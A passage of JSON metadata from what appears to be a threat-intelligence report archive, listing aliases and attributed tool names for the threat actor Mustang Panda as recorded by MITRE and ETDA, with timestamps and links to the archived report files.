"9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434173, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a0002020dd5651bfeb5f8d3092a81eb2d6df39c2.pdf", "text": "https://archive.orkl.eu/a0002020dd5651bfeb5f8d3092a81eb2d6df39c2.txt", "img": "https://archive.orkl.eu/a0002020dd5651bfeb5f8d3092a81eb2d6df39c2.jpg" } }